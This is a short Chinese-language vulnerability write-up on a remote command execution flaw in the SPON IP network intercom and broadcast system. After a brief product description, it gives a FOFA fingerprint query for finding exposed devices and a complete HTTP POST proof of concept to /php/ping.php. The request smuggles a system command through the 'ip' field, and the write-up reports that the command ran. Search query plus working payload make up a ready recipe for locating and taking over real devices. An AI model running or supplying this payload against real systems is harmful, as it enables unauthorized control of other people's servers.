世邦通信股份有限公司IP网络对讲广播系统RCE

漏洞描述

SPON世邦IP网络广播系统采用的IPAudio™技术, 将音频信号以数据包形式在局域网和广域网上进行传送，是一套纯数字传输的双向音频扩声系统。传统广播系统存在的音质不佳，传输距离有限，缺乏互动等问题。该系统设备使用简便，只需将终端接入计算机网络即可构成功能强大的数字广播系统，每个接入点无需单独布线，实现计算机网络、数字视频监控、公共广播的多网合一。其存在RCE漏洞，攻击者可通过此漏洞执行系统命令，进而控制服务器

漏洞复现

FOFA

icon_hash="-1830859634"

POC

POST /php/ping.php HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48jsondata%5Btype%5D=123&jsondata%5Bip%5D=ipconfig

bp 成功执行命令